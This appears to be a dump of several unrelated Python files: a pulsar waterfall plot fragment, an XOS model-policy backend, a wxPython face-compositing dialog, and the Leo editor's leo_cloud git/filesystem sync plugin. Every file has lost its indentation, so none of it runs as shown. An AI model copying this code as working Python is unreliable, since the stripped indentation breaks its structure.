times = pkt_utc0 - np.arange(plot_times) * local_integration * sec_per_pkt_frame
date_format = md.DateFormatter("%H:%M:%S")
medsub = True
colorscale = [-0.5, 0.5]
for i in np.arange(pkt_elems):
p.append(
ax[0, i].imshow(
waterfall[:, :, i],
aspect="auto",
animated=True,
origin="upper",
interpolation="nearest",
cmap="gray",
vmin=colorscale[0],
vmax=colorscale[1],
extent=[freqlist[0, 0], freqlist[-1, -1], tmin, tmax],
)
)
ax[0, i].set_yticklabels([])
ax[0, i].yaxis_date()
ax[0, 0].set_title(stokes_lookup[elemlist[0] + 8])
ax[0, 1].set_title(stokes_lookup[elemlist[1] + 8])
ax[0, 0].set_ylabel("Local Time")
ax[0, 0].yaxis_date()
ax[0, 0].yaxis.set_major_formatter(date_format)
for i in np.arange(pkt_elems):
p.append(
ax[1, i].imshow(
waterfold[:, :, i],
aspect="auto",
animated=True,
origin="upper",
interpolation="nearest",
cmap="gray",
vmin=colorscale[0],
vmax=colorscale[1],
extent=[freqlist[0, 0], freqlist[-1, -1], 0, 1],
)
)
ax[1, i].set_xlabel("Freq (MHz)")
ax[1, 0].set_ylabel("Pulse Phase")
cbar_ax = f.add_axes([0.85, 0.15, 0.05, 0.7])
c = f.colorbar(p[0], cax=cbar_ax)
c.set_label("Power (dB, arbitrary)")
from matplotlib.widgets import Slider, Button
rax = plt.axes([0.82, 0.03, 0.15, 0.04])
check = Button(rax, "Med Subtract")
def func(event):
global medsub, check, colorscale
medsub = not medsub
if medsub:
check.label.set_text("Med Subtracted")
colorscale = [-0.5, 0.5]
else:
check.label.set_text("Raw Power")
colorscale = [-10, 10]
check.on_clicked(func)
ani = animation.FuncAnimation(f, updatefig, frames=100, interval=100)
f.show()
|
backend_modelpolicy.py
|
# Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import inspect
import imp
import sys
import threading
import time
from syncstep import SyncStep
from synchronizers.new_base.event_loop import XOSObserver
from xosconfig import Config
from multistructlog import create_logger
log = create_logger(Config().get("logging"))
class Backend:
def run(self):
# start model policies thread
policies_dir = Config("model_policies_dir")
if policies_dir:
from synchronizers.model_policy import run_policy
model_policy_thread = threading.Thread(target=run_policy)
model_policy_thread.start()
else:
model_policy_thread = None
log.info("Skipping model policies thread due to no model_policies dir.")
while True:
try:
time.sleep(1000)
except KeyboardInterrupt:
print("exiting due to keyboard interrupt")
if model_policy_thread:
model_policy_thread._Thread__stop()
sys.exit(1)
|
face_match_frame.py
|
import os
import re
from threading import Thread
import numpy
import wx
from PIL import Image, ImageChops
from core.src.static_classes.image_deal import ImageWork
from core.src.structs_classes.drop_order import FaceDragOrder
from core.src.structs_classes.extract_structs import PerInfo
from core.src.thread_classes.quick_view import QuickRestore
from .design_frame import MyDialogAddFace
class FaceMatchFrame(MyDialogAddFace):
def __init__(self, parent, target: PerInfo):
super(FaceMatchFrame, self).__init__(parent)
# 目标对象和导入的表情
self.target = target
self.input_values = {}
# self.face_file_group = {}
self.view_list = []
self.is_all_only = True
# 生成目标立绘
self.target_img = ImageWork.az_paint_restore(target.mesh_path, target.tex_path,
not target.get_is_able_work() and target.must_able)
self.target_size = self.target_img.size
# 目标表情
self.target_face = Image.Image()
# 主图片显示区尺寸
self.main_view_w, self.main_view_h = list(self.m_bitmap_main_view.GetSize())
# 背景画布
self._bg_size = self.target_size
self.bg_paint = Image.new("RGBA", self.bg_size, (0, 0, 0, 255))
# 立绘位于背景画布位置
self.target_paint_x = 0
self.target_paint_y = 0
# 背景画布尺寸扩展
self._top_extend = 0
self._left_extend = 0
self._right_extend = 0
self._button_extend = 0
# 表情坐标
self._pos_x = 0
self._pos_y = 0
# 相对显示区坐标
self.pos_x_a = 0
self.pos_y_a = 0
# 画布显示区域左上角坐标
self._target_x = 0
self._target_y = 0
# 表情选择
self.select_index = -1
self.select_count = 0
# 表情导入
self.drop_order = FaceDragOrder(self, self.callback)
self.m_listBox_import_face.SetDropTarget(self.drop_order)
# 预览图生成器
self.view_work = ...
# 步长
self.step = 1
self.save_path = ""
self.is_alpha_paste = False
self.m_bitmap_main_view.SetDoubleBuffered(True)
@staticmethod
def paste_face(target: Image.Image, face: Image.Image, pos: tuple):
"""
透明混合背景和目标
:param target: 混合背景
:param face: 混合目标
:param pos: 混合目标绘制坐标点
:return: None
"""
target_bg = target.crop([pos[0], pos[1], pos[0] + face.width, pos[1] + face.height])
alpha = face.getchannel("A")
# alpha处理
alpha_f = alpha
alpha_g = target_bg.getchannel("A")
a_f = ImageChops.lighter(alpha_f, alpha_g)
al = numpy.array(alpha, dtype=numpy.float)
scale = al / 255
face_a = numpy.array(face)
bg_a = numpy.array(target_bg)
alpha_data = numpy.array(a_f)
bg_a[:, :, 2] = bg_a[:, :, 2] * (1 - scale)
bg_a[:, :, 1] = bg_a[:, :, 1] * (1 - scale)
bg_a[:, :, 0] = bg_a[:, :, 0] * (1 - scale)
face_a[:, :, 0] = face_a[:, :, 0] * scale
face_a[:, :, 1] = face_a[:, :, 1] * scale
face_a[:, :, 2] = face_a[:, :, 2] * scale
f_target = bg_a + face_a
f_target[:, :, 3] = alpha_data
face_e = Image.fromarray(f_target)
target.paste(face_e, pos)
# 背景扩展处理
@property
def bg_size(self):
return self._bg_size
@bg_size.setter
def bg_size(self, value):
if len(value) == 2:
# 更新背景画布尺寸,重新绘制背景图片和脸部图片
self._bg_size = value
print(value)
self.paste_target_face()
# 换头坐标处理
@property
def pos_x(self):
return self._pos_x
@property
def pos_y(self):
return self._pos_y
@pos_x.setter
def pos_x(self, value):
# 强行转义为int
value = int(value)
# 如果脸部绘制x坐标点小于0,将画布向左扩展对应的像素,再将x坐标归零
if value < 0:
self.left_extend += -value
value = 0
self.m_staticText_info.SetLabel(f"画布向左扩展{self.left_extend}像素")
# 如果脸部绘制x坐标+目标脸部的宽度大于当前画布总宽度,画布向右扩展,x值不变
elif value + self.target_face.width - self.bg_size[0] > 0:
self.right_extend += (value + self.target_face.width) - self.bg_size[0]
self.m_staticText_info.SetLabel(f"画布向右扩展{self.right_extend}像素")
# elif self.left_extend > 0 or self.right_extend > 0:
# # 其他情况下,可能存在回缩状态
# if self.left_extend > 0 and self.left_extend >= value:
# # 当向左扩展大于0,x坐标点也大于0,且左侧扩展- x >=0,左侧扩展向右回缩,回缩值为当前x值,x归零
# self.left_extend -= value
# value = 0
# self.m_staticText_info.SetLabel(f"画布向左扩展{self.left_extend}像素")
#
# elif self.right_extend > 0 and \
# self.bg_size[0] > (value + self.target_face.width) >= self.bg_size[0] - self.right_extend:
# # 当向左扩展大于0,x坐标+面部表情<总画布宽度,且(画布宽度-向右扩展)《= x坐标+面部表情宽度;
# # x最终坐标不变,向右扩展=总画布宽度-(x坐标+面部表情宽度)
# self.right_extend -= self.bg_size[0] - (value + self.target_face.width)
# self.m_staticText_info.SetLabel(f"画布向右扩展{self.right_extend}像素")
self._pos_x = value
self.add_face()
@pos_y.setter
def pos_y(self, value):
# 强行转义为int
value = int(value)
# 如果脸部绘制y坐标点小于0,将画布向上扩展对应的像素,再将y坐标归零
if value < 0:
self.top_extend += -value
value = 0
self.m_staticText_info.SetLabel(f"画布向上扩展{self.top_extend}像素")
# 如果脸部绘制y坐标+目标脸部的高度大于当前画布总高度,画布向下扩展,y值不变
elif value + self.target_face.height - self.bg_size[1] > 0:
self.button_extend = value + self.target_face.height - self.bg_size[1]
self.m_staticText_info.SetLabel(f"画布向下扩展{self.button_extend}像素")
# elif self.top_extend > 0 or self.button_extend > 0:
# # 其他情况下,可能存在回缩状态
# if self.top_extend > 0:
# # 当向上扩展大于0,y坐标点也大于0,且顶部扩展- y >=0,顶部扩展向下回缩,回缩值为当前y值,y归零
# if self.top_extend >= value:
# self.top_extend -= value
# else:
# self.top_extend = 0
# value = 0
# self.m_staticText_info.SetLabel(f"画布向上扩展{self.top_extend}像素")
#
# elif self.button_extend > 0:
# # 当向下扩展大于0,y坐标+面部表情高度<总画布高度,且(画布高度-向下扩展)《= y坐标+面部表情高度;
# # y最终坐标不变,向下扩展-=总画布高度-(y坐标+面部表情高度)
# if self.bg_size[1] > (value + self.target_face.height) > self.bg_size[1] - self.button_extend:
# self.button_extend -= self.bg_size[1] - (value + self.target_face.height)
# elif(value + self.target_face.height)<= self.bg_size[1] - self.button_extend:
# self.button_extend = 0
# self.m_staticText_info.SetLabel(f"画布向下扩展{self.button_extend}像素")
self._pos_y = value
self.add_face()
# 画布坐标处理
@property
def target_x(self):
return str(self._target_x)
@target_x.setter
def target_x(self, value):
if value < 0:
value = 0
if value + self.main_view_w > self.bg_size[0]:
value = self.bg_size[0] - self.main_view_w
self._target_x = value
# self.pos_x += value - self.main_view_w
self.paint_move(self._target_x, self._target_y)
@property
def target_y(self):
return str(self._target_y)
@target_y.setter
def target_y(self, value):
if value < 0:
value = 0
if value + self.main_view_h > self.bg_size[1]:
value = self.bg_size[1] - self.main_view_h
self._target_y = value
# self.pos_y += value - self.main_view_h
self.paint_move(self._target_x, self._target_y)
# 画布扩展处理
@property
def top_extend(self):
return self._top_extend
@property
def left_extend(self):
return self._left_extend
@property
def right_extend(self):
return self._right_extend
@property
def button_extend(self):
return self._button_extend
@top_extend.setter
def top_extend(self, value):
self.target_paint_y = value
self.bg_size = (self.target_size[0] + self.left_extend + self.right_extend,
self.target_size[1] + value + self.button_extend)
self._top_extend = value
@left_extend.setter
def left_extend(self, value):
self.target_paint_x = value
self.bg_size = (self.target_size[0] + value + self.right_extend, self.target_size[1] +
self.top_extend + self.button_extend)
self._left_extend = value
@right_extend.setter
def right_extend(self, value):
self.bg_size = (self.target_size[0] + value + self.left_extend, self.target_size[1] +
self.top_extend + self.button_extend)
self._right_extend = value
@button_extend.setter
def button_extend(self, value):
self.bg_size = (self.target_size[0] + self.left_extend + self.right_extend,
self.target_size[1] + value + self.top_extend)
self._button_extend = value
def callback(self, values, is_all_only):
self.input_values = values
self.view_list = list(values.keys())
self.m_listBox_import_face.Clear()
self.m_listBox_import_face.Set(self.view_list)
self.is_all_only = is_all_only
if self.view_list:
self.m_panel7.Enable(True)
# for key in values.keys():
# value = values[key]
# temp = []
# for each in value:
# if os.path.isfile(each):
# pic = Image.open(each)
# temp.append(pic)
# self.face_file_group[key] = temp
def paste_target_face(self):
self.bg_paint = Image.new("RGBA", self.bg_size, (0, 0, 0, 0))
self.bg_paint.paste(self.target_img, (self.target_paint_x, self.target_paint_y))
if self.is_alpha_paste:
FaceMatchFrame.paste_face(self.bg_paint, self.target_face, (self.pos_x, self.pos_y))
else:
self.bg_paint.paste(self.target_face, (self.pos_x, self.pos_y), 0)
def paint_move(self, target_x, target_y):
pic = self.bg_paint.crop((target_x, target_y, self.main_view_w + target_x, self.main_view_h + target_y))
temp = wx.Bitmap.FromBufferRGBA(pic.width, pic.height, pic.tobytes())
self.m_bitmap_main_view.ClearBackground()
self.m_bitmap_main_view.SetBitmap(temp)
def add_face(self):
self.paste_target_face()
self.paint_move(self._target_x, self._target_y)
def export_all(self):
bg_size = self.bg_size
pos = (self.pos_x, self.pos_y)
target_pos = (self.target_paint_x, self.target_paint_y)
face_size = self.target_face.size
save_path = self.save_path
name = self.target.cn_name
target_img = self.target_img
os.makedirs(save_path, exist_ok=True)
for key, values in self.input_values.items():
count = 0
for value in values:
count += 1
temp = Image.open(value)
if temp.size == face_size:
pic = Image.new("RGBA", bg_size, 0)
pic.paste(target_img, target_pos, 0)
if self.is_alpha_paste:
FaceMatchFrame.paste_face(pic, temp, pos)
else:
pic.paste(temp, pos, 0)
path = os.path.join(save_path, f"{name}-{key}-{count}.png")
self.m_staticText_info.SetLabel(f"正在接头:{name}-{key}-{count}")
pic.save(path)
else:
continue
self.m_staticText_info.SetLabel(f"接头完成")
def initial(self, event):
self.bg_paint.paste(self.target_img, (0, 0))
self.paint_move(0, 0)
self.m_panel7.Enable(False)
def change_method(self, event):
self.is_alpha_paste = bool(event.GetSelection())
self.add_face()
def select_face(self, event):
index = event.GetSelection()
values = self.input_values[self.view_list[index]]
if index == self.select_index:
if self.select_count < len(values) - 1:
self.select_count += 1
else:
self.select_count = 0
else:
self.select_index = index
self.select_count = 0
guid = values[self.select_count]
temp = PerInfo(f"{self.view_list[index]}-{self.select_count}",
f"{self.view_list[index]}-{self.select_count}",
False)
temp.tex_path = guid
self.view_work = QuickRestore(temp, None,
size=tuple(self.m_panel_face.GetSize()),
bitmap_show=self.m_bitmap_face,
info_show=self.m_staticText_info)
self.view_work.start()
self.m_notebook_info.SetSelection(2)
self.target_face = Image.open(guid)
self.add_face()
@staticmethod
def value_check(event):
"""
:param event:
:return: if OK return True or return False
"""
value = event.GetString()
temp = re.sub(r'[^0-9\-]', "", value)
temp.replace(".", "")
temp.replace("-", "-0")
# temp = re.sub(r'^-', "", temp)
# temp = re.sub(r'\.\d+$', "", temp)
if temp != value or temp == "":
return False, temp
else:
return True, temp
def value_check_x(self, event):
is_ok, value = self.value_check(event)
self.pos_x = value
if not is_ok:
# self.m_textCtrl_x_value.Clear()
self.m_textCtrl_x_value.SetLabel(self.pos_x)
else:
pass
def value_check_y(self, event):
is_ok, value = self.value_check(event)
self.pos_y = value
if not is_ok:
# self.m_textCtrl_y_value.Clear()
self.m_textCtrl_y_value.SetLabel(self.pos_y)
else:
pass
def value_check_px(self, event):
is_ok, value = self.value_check(event)
self.target_x = int(value)
if not is_ok or value != self.target_x:
# self.m_textCtrl_pic_x.Clear()
self.m_textCtrl_pic_x.SetLabel(self.target_x)
else:
pass
def value_check_py(self, event):
is_ok, value = self.value_check(event)
self.target_y = int(value)
if not is_ok or value != self.target_y:
# self.m_textCtrl_pic_y.Clear()
self.m_textCtrl_pic_y.SetLabel(self.target_y)
else:
pass
def wheel_x(self, event):
angle = event.GetWheelRotation()
guide = -angle // abs(angle)
self.pos_x = self.pos_x + guide * self.step
self.m_textCtrl_x_value.SetLabel(str(self.pos_x))
def y_wheel(self, event):
angle = event.GetWheelRotation()
guide = -angle // abs(angle)
self.pos_y = self.pos_y + guide * self.step
self.m_textCtrl_y_value.SetLabel(str(self.pos_y))
def px_wheel(self, event):
angle = event.GetWheelRotation()
guide = -angle // abs(angle)
self.target_x = self._target_x + guide * self.step
self.m_textCtrl_pic_x.SetLabel(self.target_x)
def py_wheel(self, event):
angle = event.GetWheelRotation()
guide = -angle // abs(angle)
self.target_y = self._target_y + guide * self.step
self.m_textCtrl_pic_y.SetLabel(self.target_y)
def set_step(self, event):
value = event.GetString()
self.step = int(value)
def on_erase(self, event):
pass
def export(self, event):
dialog = wx.SingleChoiceDialog(self, "选择导出类型", "选择导出类型", ("仅导出当前表情组合", "导出全部相同尺寸表情组合"))
if dialog.ShowModal() == wx.ID_OK:
select = dialog.GetSelection()
# 如果使用最小尺寸导出
if self.m_checkBox_minosity_size.GetValue():
begin_x = min(self.target_paint_x, self.pos_x)
begin_y = min(self.target_paint_y, self.pos_y)
end_x = max(self.target_paint_x + self.target_size[0], self.pos_x + self.target_face.width)
end_y = max(self.target_paint_y + self.target_size[1], self.pos_x, +self.target_face.height)
face_x_change = self.pos_x - begin_x
face_y_change = self.pos_y - begin_y
target_x_change = self.target_paint_x - begin_x
target_y_change = self.target_paint_y - begin_y
self.pos_x = face_x_change
self.pos_y = face_y_change
self.target_paint_x = target_x_change
self.target_paint_y = target_y_change
self.bg_size = (end_x - begin_x, end_y - begin_y)
self.m_staticText_info.SetLabel(f"尺寸修改为:{self.bg_size}")
if select == 0:
dialog = wx.FileDialog(self, f"导出{self.target.cn_name}-{self.select_index}表情组合", "./",
f"{self.target.cn_name}-{self.select_index}.png", wildcard="*.png",
style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
if dialog.ShowModal() == wx.ID_OK:
path = dialog.GetPath()
self.bg_paint.save(path)
else:
dialog = wx.DirDialog(self, "导出文件夹", "./",
wx.DD_NEW_DIR_BUTTON | wx.DD_CHANGE_DIR | wx.DD_DEFAULT_STYLE)
if dialog.ShowModal() == wx.ID_OK:
self.save_path = dialog.GetPath()
thread = Thread(target=self.export_all)
thread.start()
|
leo_cloud.py
|
"""
leo_cloud.py - synchronize Leo subtrees with remote central server
Terry N. Brown, terrynbrown@gmail.com, Fri Sep 22 10:34:10 2017
This plugin allows subtrees within a .leo file to be stored in the cloud. It
should be possible to support various cloud platforms, currently git and systems
like DropBox are supported (i.e. you can use GitLab or GitHub or your own remote
git server).
A leo_cloud subtree has a top node with a headline that starts with
'@leo_cloud'. The rest of the headline is ignored. The body of this top node is
used to describe the cloud service, e.g.:
type: Git
remote: git@gitlab.com:tnbrown/leo_cloud_storage.git
local: ~/.leo/leo_cloud/gitlab_leo_cloud_storage
ID: shortcuts
read_on_load: ask
write_on_save: ask
The first three lines can be repeated with different IDs to store
different subtrees at the same remote cloud location.
read_on_load: / write_on_save: can be yes, no, ask, or background (read_on_load
only). If it's not one of those three, there's a warning dialog. `background`
performs a check against the cloud in the background, and then behaves like
`ask` if a difference is detected.
There's also a file system backend, which would look like this:
type: FileSystem
root: ~/DropBox/leo_cloud
ID: my_notes
read_on_load: ask
write_on_save: ask
If you set up the FileSystem backend it into a folder that is sync'ed
externally, as shown above, it can serve as a cloud adapter for services like
DropBox, Google Drive, OneDrive, etc. etc.
In addition to the Git and FileSystem cloud types it should be possible to add
many others - AWS, WebDAV, sFTP, whatever.
FYI: https://gitlab.com/ gives you free private repos.
The plugin stores headline, body, and uA (unknown attributes). The caveat is
that it must be JSON serializable, this is to avoid pickle flavor issues. I
don't think this will cause problems except for legacy datetime objects from the
todo.py plugin and set()s in the tags plugin. I think both can be fixed easily -
a custom JSON writer can write datetime as iso string time and sets as lists,
and the tags plugin can coerce lists to sets. I think the todo.py plugin already
reads iso string time values.
My intended use was a common synchronized todo list across machines, which this
achieves.
An unintended bonus is that you can use it to sync. your settings across
machines easily too. Like this:
@settings
@keys
@leo_cloud
@shortcuts
"just works", so now your shortcuts etc. can be stored on a central
server.
"""
# pylint: disable=unused-import
import json
import os
import re
import shlex
import subprocess
import threading
from copy import deepcopy
from datetime import date, datetime
from hashlib import sha1
import leo.core.leoGlobals as g
from leo.core.leoNodes import vnode
from leo.core.leoQt import QtCore # see QTimer in LeoCloud.__init__
# for 'key: value' lines in body text
KWARG_RE = re.compile(r"^([A-Za-z][A-Za-z0-9_]*): (.*)")
def init ():
g.registerHandler(('new','open2'), onCreate)
g.registerHandler(('save1'), onSave)
g.plugin_signon(__name__)
return True
def onCreate (tag, keys):
c = keys.get('c')
if not c:
return
c._leo_cloud = LeoCloud(c)
def onSave(tag, keys):
c = keys.get('c')
if not c:
return
if getattr(c, '_leo_cloud'):
c._leo_cloud.save_clouds()
return None # explicitly not stopping save1 hook
@g.command("lc-read-current")
def lc_read_current(event):
"""write current Leo Cloud subtree to cloud"""
c = event.get('c')
if not c or not hasattr(c, '_leo_cloud'):
return
c._leo_cloud.read_current()
@g.command("lc-write-current")
def lc_write_current(event):
"""write current Leo Cloud subtree to cloud"""
c = event.get('c')
if not c or not hasattr(c, '_leo_cloud'):
return
c._leo_cloud.write_current()
class LeoCloudIOBase:
"""Leo Cloud IO layer Base Class
LeoCloudIO layer sits between LeoCloud plugin and backends,
which might be leo_cloud_server.py or Google Drive etc. etc.
"""
def __init__(self, c, p, kwargs):
"""
:param context c: Leo outline
:param position p: @leo_cloud position
:param dict kwargs: key word args from p.b
"""
self.v = p.v
self.c = c
self.lc_id = kwargs['ID']
def get_subtree(self, lc_id):
"""get_subtree - get a Leo subtree from the cloud
:param str(?) lc_id: resource to get
:returns: vnode build from lc_id
"""
# pylint: disable=no-member
# self.get_data
return self.c._leo_cloud.from_dict(self.get_data(lc_id))
def put_subtree(self, lc_id, v):
"""put - put a subtree into the Leo Cloud
:param str(?) lc_id: place to put it
:param vnode v: subtree to put
"""
# pylint: disable=no-member
# self.put_data
self.put_data(lc_id, LeoCloud.to_dict(v))
class LeoCloudIOFileSystem(LeoCloudIOBase):
"""Leo Cloud IO layer that just loads / saves local files.
i.e it's just for development / testing
"""
def __init__(self, c, p, kwargs):
"""
:param str basepath: root folder for data
"""
LeoCloudIOBase.__init__(self, c, p, kwargs)
self.basepath = kwargs['root']
if not os.path.exists(self.basepath):
os.makedirs((self.basepath))
def get_data(self, lc_id):
"""get_data - get a Leo Cloud resource
:param str(?) lc_id: resource to get
:returns: object loaded from JSON
"""
filepath = os.path.join(self.basepath, lc_id+'.json')
with open(filepath) as data:
return json.load(data)
def put_data(self, lc_id, data):
"""put - store data in the Leo Cloud
:param str(?) lc_id: place to put it
:param obj data: data to store
"""
filepath = os.path.join(self.basepath, lc_id+'.json')
with open(filepath, 'w') as out:
return out.write(LeoCloud.to_json(data))
class LeoCloudIOGit(LeoCloudIOBase):
"""Leo Cloud IO layer that just loads / saves local files.
i.e it's just for development / testing
"""
def __init__(self, c, p, kwargs):
"""
:param str basepath: root folder for data
"""
# if p.v._leo_cloud_io was used, we'd probably also need to pull
# in get_data(), so don't bother with p.v._leo_cloud_io
# p.v._leo_cloud_io = self
LeoCloudIOBase.__init__(self, c, p, kwargs)
self.remote = kwargs['remote']
self.local = os.path.expanduser(kwargs['local'])
if not os.path.exists(self.local):
os.makedirs((self.local))
if not os.listdir(self.local):
self._run_git('git clone "%s" "%s"'% (self.remote, self.local))
self._run_git('git -C "%s" pull' % self.local)
def _run_git(self, text):
"""_run_git - run a git command
:param str text: command to run
"""
subprocess.Popen(shlex.split(text)).wait()
def get_data(self, lc_id):
"""get_data - get a Leo Cloud resource
:param str(?) lc_id: resource to get
:returns: object loaded from JSON
"""
filepath = os.path.join(self.local, lc_id+'.json')
with open(filepath) as data:
return json.load(data)
def put_data(self, lc_id, data):
"""put - store data in the Leo Cloud
:param str(?) lc_id: place to put it
:param obj data: data to store
"""
filepath = os.path.join(self.local, lc_id+'.json')
with open(filepath, 'w') as out:
out.write(LeoCloud.to_json(data))
self._run_git('git -C "%s" add "%s"' % (self.local, lc_id+'.json'))
self._run_git('git -C "%s" commit -mupdates' % self.local)
self._run_git('git -C "%s" push' % self.local)
class LeoCloud:
def __init__(self, c):
"""
:param context c: Leo context
"""
self.c = c
self.bg_finished = False # used for background thread
self.bg_results = [] # results from background thread
# we're here via open2 hook, but too soon to load from cloud,
# so defer
QtCore.QTimer.singleShot(0, self.load_clouds)
def bg_check(self, to_check):
"""
bg_check - run from load_clouds() to look for changes in
cloud in background.
WARNING: no gui impacting calls allowed here (g.es() etc.)
:param list to_check: list of (vnode, kwargs, hash) tuples to check
This (background) thread can't handle any changes found, because it
would have to interact with the user and GUI code can only be called
from the main thread. We don't want to use QThread, to allow this to
work without Qt. So we just collect results and set
self.bg_finished = True, which the main thread watches using g.IdleTime()
"""
for v, kwargs, local_hash in to_check:
c = v.context
p = c.vnode2position(v)
lc_io = getattr(v, '_leo_cloud_io', None) or self.io_from_node(p)
subtree = lc_io.get_subtree(lc_io.lc_id)
remote_hash = self.recursive_hash(subtree, [], include_current=False)
self.bg_results.append((v, local_hash == remote_hash))
self.bg_finished = True
def bg_post_process(self, timer):
"""
bg_post_process - check to see if background checking is finished,
handle any changed cloud trees found
:param leo-idle-timer timer: Leo idle timer
"""
if not self.bg_finished:
return
timer.stop()
from_background = set()
for v, unchanged in self.bg_results:
kwargs = self.kw_from_node(v)
if unchanged:
g.es("Cloud tree '%s' unchanged" % kwargs['ID'])
else:
from_background.add((kwargs['remote'], kwargs['ID']))
g.es("Cloud tree '%s' DOES NOT MATCH" % kwargs['ID'])
if from_background:
self.load_clouds(from_background=from_background)
def find_at_leo_cloud(self, p):
"""find_at_leo_cloud - find @leo_cloud node
:param position p: start from here, work up
:return: position or None
"""
while not p.h.startswith("@leo_cloud") and p.parent():
p = p.parent()
if not p.h.startswith("@leo_cloud"):
g.es("No @leo_cloud node found", color='red')
return
return p
def _find_clouds_recursive(self, v, found):
"""see find_clouds()"""
if v.h.startswith('@ignore'):
return
if v.h.startswith('@leo_cloud'):
found.add(v)
return
else:
for child in v.children:
self._find_clouds_recursive(child, found)
def find_clouds(self):
"""find_clouds - return a list of @leo_cloud nodes
respects @ignore in headlines, doesn't recurse into @leo_cloud nodes
"""
found = set()
self._find_clouds_recursive(self.c.hiddenRootNode, found)
valid = []
for lc in found:
if 'ID' in self.kw_from_node(lc):
valid.append(lc)
else:
g.es('%s - no ID: line' % lc.h, color='red')
return valid
def _from_dict_recursive(self, top, d):
"""see from_dict()"""
top.h = d['h']
top.b = d['b']
top.u = d['u']
top.children[:] = []
for child in d['children']:
top.children.append(self._from_dict_recursive(vnode(self.c), child))
return top
def from_dict(self, d):
"""from_dict - make a Leo subtree from a dict
:param dict d: input dict
:return: vnode
"""
return self._from_dict_recursive(vnode(self.c), d)
def io_from_node(self, p):
"""io_from_node - create LeoCloudIO instance from body text
:param position p: node containing text
:return: LeoCloudIO instance
"""
kwargs = self.kw_from_node(p)
# pylint: disable=eval-used
lc_io_class = eval("LeoCloudIO%s" % kwargs['type'])
return lc_io_class(self.c, p, kwargs)
def kw_from_node(self, p):
"""kw_from_node - read keywords from body text
:param position p: node containing text
:return: dict
"""
kwargs = {}
for line in p.b.split('\n'):
kwarg = KWARG_RE.match(line)
if kwarg:
kwargs[kwarg.group(1)] = kwarg.group(2)
return kwargs
def load_clouds(self, from_background=None):
"""
load_clouds - Handle loading from cloud on startup and after
background checking for changes.
:param set from_background: set of (remote, ID) str tuples if we're
called after a background check process finds changes.
:return: <|returns|>
:rtype: <|return type|>
"""
if from_background is None:
from_background = set()
skipped = []
background = [] # things to check in background
for lc_v in self.find_clouds():
kwargs = self.kw_from_node(lc_v)
if from_background and \
(kwargs['remote'], kwargs['ID']) not in from_background:
# only process nodes from the background checking
continue
read = False
read_on_load = kwargs.get('read_on_load', '').lower()
if from_background:
# was 'background', changes found, so now treat as 'ask'
read_on_load = 'ask'
if read_on_load == 'yes':
read = True
elif read_on_load == 'ask':
try:
last_read = datetime.strptime(
lc_v.u['_leo_cloud']['last_read'], "%Y-%m-%dT%H:%M:%S.%f")
except KeyError:
last_read = None
message = "Read cloud data '%s', overwriting local nodes?" % kwargs['ID']
if last_read:
delta = datetime.now() - last_read
message = "%s\n%s, %sh:%sm:%ss ago" % (
message, last_read.strftime("%a %b %d %H:%M"),
24*delta.days+int(delta.seconds / 3600),
int(delta.seconds / 60) % 60,
delta.seconds % 60)
read = g.app.gui.runAskYesNoCancelDialog(self.c, "Read cloud data?",
message=message)
read = str(read).lower() == 'yes'
if read:
self.read_current(p=self.c.vnode2position(lc_v))
elif read_on_load == 'background':
# second time round, with from_background data, this will
# have been changed to 'ask' (above), so no infinite loop
background.append((lc_v, kwargs,
self.recursive_hash(lc_v, [], include_current=False)))
elif read_on_load == 'no':
g.es("NOTE: not reading '%s' from cloud" % kwargs['ID'])
elif read_on_load != 'ask':
skipped.append(kwargs['ID'])
if skipped:
g.app.gui.runAskOkDialog(self.c, "Unloaded cloud data",
message="There is unloaded (possibly stale) cloud data, use\nread_on_load: yes|no|ask\n"
"in @leo_cloud nodes to avoid this message.\nUnloaded data:\n%s" % ', '.join(skipped))
if background:
# send to background thread for checking
names = ', '.join([i[1]['ID'] for i in background])
g.es("Checking cloud trees in background:\n%s" % names)
thread = threading.Thread(target=self.bg_check, args=(background,))
thread.start()
# start watching for results
g.IdleTime(self.bg_post_process).start()
def read_current(self, p=None):
"""read_current - read current tree from cloud
"""
if p is None:
p = self.find_at_leo_cloud(self.c.p)
if not p:
return
old_p = self.c.p.copy()
g.es("Reading from cloud...") # some io's as slow to init. - reassure user
# io's can cache themselves on the vnode, but should think hard
# about whether they want to
lc_io = getattr(p.v, '_leo_cloud_io', None) or self.io_from_node(p)
v = lc_io.get_subtree(lc_io.lc_id)
p.deleteAllChildren()
for child_n, child in enumerate(v.children):
child._addLink(child_n, p.v)
if hasattr(self.c, 'cleo'):
self.c.cleo.loadAllIcons()
self.c.redraw(p=old_p if self.c.positionExists(old_p) else p)
g.es("Read %s" % lc_io.lc_id)
# set c changed but don't dirty tree, which would cause
# write to cloud prompt on save
self.c.setChanged(changedFlag=True)
p.v.u.setdefault('_leo_cloud', {})['last_read'] = datetime.now().isoformat()
@staticmethod
def recursive_hash(nd, tree, include_current=True):
"""
recursive_hash - recursively hash a tree
Note - currently unused but intend to use to analyse changes in trees
:param vnode nd: node to hash
:param list tree: recursive list of hashes
:param bool include_current: include h/b/u of current node in hash?
:return: sha1 hash of tree
:rtype: str
Calling with include_current=False ignores the h/b/u of the top node
To hash a dict, need a string representation
that sorts keys, i.e. json.dumps(s, sort_keys=True)
"""
childs = []
hashes = [LeoCloud.recursive_hash(child, childs) for child in nd.children]
if include_current:
hashes.extend([nd.h + nd.b + json.dumps(LeoCloud._ua_clean(nd.u), sort_keys=True)])
whole_hash = sha1(''.join(hashes).encode('utf-8')).hexdigest()
tree.append([whole_hash, childs])
return whole_hash
def save_clouds(self):
"""check for clouds to save when outline is saved"""
skipped = []
no = []
unchanged = []
for lc_v in self.find_clouds():
kwargs = self.kw_from_node(lc_v)
write = False
write_on_save = kwargs.get('write_on_save', '').lower()
if not self.subtree_changed(lc_v):
write_on_save = 'unchanged'
if write_on_save == 'yes':
write = True
elif write_on_save == 'ask':
write = g.app.gui.runAskYesNoCancelDialog(self.c, "Write cloud data?",
message="Write cloud data '%s', overwriting remote version?" % kwargs['ID'])
write = str(write).lower() == 'yes'
if write:
self.write_current(p=self.c.vnode2position(lc_v))
